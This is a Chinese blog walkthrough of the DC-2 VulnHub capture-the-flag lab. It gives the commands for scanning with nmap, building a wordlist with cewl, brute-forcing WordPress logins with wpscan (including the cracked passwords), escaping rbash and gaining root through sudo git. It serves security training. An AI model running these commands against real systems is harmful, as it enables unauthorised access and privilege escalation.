DC系列靶机2通关教程

已于 2023-09-17 19:26:44 修改
阅读量108 收藏
点赞数 4
分类专栏: DC系列 文章标签: 安全 网络安全 web安全 靶机 DC
于 2023-08-16 22:35:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58954236/article/details/132330408
版权

DC-2

信息收集

arp-scan -l #扫描局域网中所有设备

image-20230811211454335

nmap -p- -A 192.168.16.161 #扫描靶机端口

image-20230811212107597

发现有80端口,直接访问192.168.16.161,可是发现无法访问被重定向到了http://dc-2/

image-20230811212425319

可以修改hosts文件,hosts文件是负责IP地址与域名快速解析的文件,hosts文件位置在:/etc/hosts

vim /etc/hosts

image-20230811213349320

/etc/init.d/networking restart #配置好后重启服务

修改过hosts后就可以登录DC-2的网站了

image-20230811213845467

密码爆破

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.More passwords is always better, but sometimes you just can’t win them all.Log in as one to see the next flag.If you can’t find it, log in as another.

你通常使用的单词表可能不起作用,所以你可能只需要 "cewl"。密码越多越好,但有时你就是无法赢得所有密码。以一个人的身份登录,查看下一面旗帜。如果找不到,就以另一个身份登录。

第一步

flag提示需要使用cewl工具爬取密码,再进行用户账户密码爆破

cewl 是一个命令行工具,用于从网页中提取信息。

https://www.freebuf.com/articles/network/190128.html此网址为cewl的使用方法

cewl http://dc-2/ -w password.txt #将爬出的密码存放至password.txt
cat password.txt #查看爬出的密码

image-20230812093221532

第二步

使用Wappalyzer扫描查看网站使用的技术,发现使用的是WordPress框架

image-20230812100356633

使用wpscan暴力枚举用户名

https://www.jianshu.com/p/a0143cc79215此网站记载wpscan的使用方法

wpscan --url http://dc-2/ -e u #参数信息:--url | -u 配置扫描URL,--enumerate | -e 枚举信息;选项:u 枚举用户名,默认从1-10

说明:

--url #要扫描的目标url,允许的协议http、https,默认使用http协议。

-e #选项启用详细扫描模式,将执行更深入的安全测试。

#在详细扫描模式下,wpscan 将进行以下操作:

#    1.识别已安装的WordPress版本。

#    2.检测已知的WordPress漏洞和安全问题。

#    3.扫描目标站点的插件和主题,查找可能存在的漏洞或安全弱点。

#    4.查找可公开访问的文件和目录。

#    5.爬取网站,并尝试发现隐藏页面或目录。

#    6.分析目标网站的用户信息,包括用户名、用户ID等。

#    7.进行弱密码猜测,尝试使用常见的用户名和密码组合进行登录。

image-20230812094835120

image-20230812094915950

得到三名用户:admin,tom,Jerry

第三步

创建用户字典,使用wpscan爆破用户密码

vim user.txt

admin
tom
jerry

image-20230812100727636

密码爆破

wpscan --url http://dc-2/ -U user.txt -P password.txt

image-20230812101628128

image-20230812102130533

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

第四步

扫描网页

nikto -h http://dc-2/

nikto 是一个开源的网络安全扫描工具,用于检测和评估目标网站上存在的漏洞和安全风险。它可以对Web服务器进行全面的漏洞扫描,包括敏感文件、配置错误、弱密码等。

在这个命令中,-hnikto 命令的一个选项,用于指定目标主机。在这里,目标主机是 http://dc-2/http://dc-2/ 是一个URL,指向名为 dc-2 的主机或网站。

image-20230812105158639

查到登录路径:wp-login.php

image-20230812105323377

第五步

使用jerry身份登录wordpress,获得flag2

image-20230812105830339

image-20230812110020385

也使用tom的账户登录,什么也没有发现,查看其他的端口

再次使用nmap扫描所有端口,发现打开了ssh服务端口号为7744

image-20230812110354667

登录ssh

ssh jerry@192.168.16.161 -p 7744
ssh -p 7744 tom@192.168.16.161

image-20230812110923583

image-20230812111150478

发现有rbash限制 https://blog.csdn.net/weixin_43705814/article/details/111879362rbash解释和绕过

绕过rbash

BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出

image-20230812113425954

发现flag3,查看内容

image-20230812113527701

flag3内容提到了jerry,查看是否有Jerry用户

image-20230812113732848

切换jerry用户

su jerry

image-20230812113858679

提权

切换目录至root查看内容,发现flag4,查看内容

image-20230812114038453

这里提示使用git进行提权

查找root设置了suid权限的文件,并将错误写入 /dev/null

find / -user root -perm /4000 2>/dev/null

image-20230812114949763

看到有sudo权限,使用sudo -l显示当前用户能过使用的sudo命令有哪些

image-20230812115144349

发现可利用sudo执行git命令,查看提权网站https://gtfobins.github.io/

image-20230812115409170

sudo git -p help config
!/bin/sh

得到root权限,并发现最终flag,查看内容

image-20230812115953285

image-20230812120224024

也能使用提权工具gtfo-master进行提权,在新窗口输入

cd gtfo-master
python3 gtfo.py git

回到远程登录的窗口,输入提权命令

git branch --help config		# 提权命令1
sudo git help config			# 提权命令2
 #提权命令任选其一就可以了
!/bin/sh

image-20230812140452122

gtfo-master进行提权,在新窗口输入

cd gtfo-master
python3 gtfo.py git

回到远程登录的窗口,输入提权命令

git branch --help config		# 提权命令1
sudo git help config			# 提权命令2
 #提权命令任选其一就可以了
!/bin/sh

[外链图片转存中…(img-g6a2l3xF-1692196414371)]

image-20230812140538156

网安咸鱼1517
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DC-1靶机教程
qq_42553928的博客
04-07 5245
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
DC-2 靶机
weixin_63492470的博客
03-11 5461
DC-2靶机下载地址: DC-2 | Five86 | DC Challenges 环境:DC-2靶机地址:192.168.1.139 nmap -sP 192.168.1.0/24 查看ip nmap -A 192.168.1.139 #这里我的靶机IP是132 dirb 192.168.1.139 爆破目录 这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、 然后访问192.168.1.139发现是这个界面,什么也没有看到..
DC系列靶机1通关教程
weixin_58954236的博客
08-04 211
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。Meterpreter的功能强大,灵活性高,提供了很多有用的命令和功能,包括:进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。
DC系列靶机3通关教程
weixin_58954236的博客
09-18 460
save保存,保存就上传成功了,再根据joomla的特性,模块会单独放在一个文件夹里/templates/,而beez3模块就在/templates/beez3/里面,刚才创建的webshell路径为。利用John工具,对该密码进行爆破拆解,先在桌面创建一个文件,将上面的hash密码复制进去并保存,接着使用John指向该文件。文本中写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的连接。然后访问上传的文件webshell的地址,执行反弹shell的PHP代码。
vulnhub-DC系列通关DC1靶机渗透
qq_35258210的博客
02-07 1562
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vulnhub-DC系列通关DC3靶机渗透
qq_35258210的博客
02-15 552
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 目录 明确目标 信息收集 whatweb指纹识别工具 dirb目录扫描工具 joomscan(joomla框架专门的漏洞扫描器) searchsploit Ndya搜索工具 渗透攻击 sqlmap使用 john密码爆破工具 后渗透 提权&flag ----nc瑞士军刀工具 靶机汇总:https://blog.csdn.net/qq_35258210/article/d
(VulnHub靶机通关DC-9
yang1234567898的博客
01-23 766
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2998
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
结合量子技术解决数据传输安全
编程之道在明明德在亲民在止于至善
08-22 1225
结合量子技术解决数据传输安全
独立ip为何高级又安全
最新发布
yls5yl的博客
08-22 266
独立IP,也称为静态IP,是指由网络服务商直接分配给用户的一个独立的IP地址,该IP地址不会因用户关机、重启或断开网络而发生改变。1. 防止IP被封锁:在使用共享IP时,如果其中一个用户因违反规定或被举报而被封锁IP,其他用户也可能会受到影响。3. 隐藏真实IP地址:使用独立IP可以更好地保护用户的隐私和安全,因为用户可以通过代理服务器或VPN等手段使用独立IP进行上网,隐藏自己的真实IP地址,防止被黑客攻击或被追踪。搜索引擎会认为拥有独立IP的网站更可靠,更容易被收录和排名。
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 557
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
【软件文档大全】软件开发常用文档(程序开发过程-实施-运维-安全-交付-资质-标书)
2302_79423711的博客
08-21 714
测试报告,项目总结报告,立项结项审批表,成本估算表,项目计划,项目周报月报,风险管理计划,质量保证措施,项目甘特图,项目管理工具,操作手册,接口设计文档,软件实施方案,运维方案,安全检测报告,投标响应文件,开工申请表,开工报告,概要设计检查表,详细设计检查表,需求规格说明书检查表,需求确认表,系统代码编写规范,软件项目质量保证措施,软件部署方案,试运行方案,培训计
IP SSL证书的未来趋势:适应不断变化的安全挑战
2401_86337938的博客
08-21 973
随着网络攻击手段的不断进化和用户对隐私保护意识的增强,IP SSL证书作为保障网络安全的关键组件之一,也在不断地发展和完善。随着网络安全意识的提高和法规对HTTPS采用的推动,IP SSL证书的应用范围将进一步扩大。为了应对不断升级的安全威胁,IP SSL证书将采用更强大的加密算法,以确保数据传输的安全性。未来的IP SSL证书可能会集成更多的身份验证机制,比如多因素认证(MFA),以增强证书的整体安全性。随着物联网设备数量的激增,IP SSL证书也将需要适应这些设备的安全需求,确保它们之间的通信安全
SQL手工注入漏洞测试(MongoDB数据库)靶场通关攻略
Nai_zui_jiang的博客
08-20 217
得到密码之后,我们就可以获得数据了,先将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。如果第⼀个⽤户账号密码登录不了,我们就改变查询的索引“find()[1]"查询 其他的⽤户账号密码登录即可。成功回显1,2,接下来我们开始尝试查询数据库。这里显示用户已禁用,那么我们就换一个用户。得到之后我们就可以继续查询他的表名了。最后我们就可以爆出他表里的数据了。好了这里我们就登录进去了。
FTP协议-匿名用户登录 从0到1
2401_83799022的博客
08-21 930
本文将介绍FTP协议、FTP匿名用户登录及其具体流程分析和自动化利用demo。如果想更进一步,可以对端口进行遍历或指定探测,与特定服务返回数据包中固定字段进行匹配识别出协议再打对应协议漏洞poc。很多人以为FTP是一个服务,实际上FTP 是一个协议而不是一个服务,应用到FTP协议的服务有很多,常用的就是vsftpd。FTP是File Transfer Protocol(文件传输协议)的简称,用于internet上的控制文件的双向传输。接下来就是整个登录的流程,包括指定用户、输入密码和登录成功。
HttpWebRequest访问https请求被中止: 未能创建 SSL/TLS 安全通道
sleepingboy888的专栏
08-22 338
C# HttpWebRequest:未能创建SSL/TLS 安全通道
Zico2靶机渗透测试实战指南
这个Zico2渗透实战教程涵盖了渗透测试的基本流程,包括环境配置、信息收集和漏洞利用,为学习者提供了一个实践渗透测试技能的平台。通过这种方式,安全专业人员可以提高自己的技能,同时理解如何在现实世界中保护...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安咸鱼1517

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值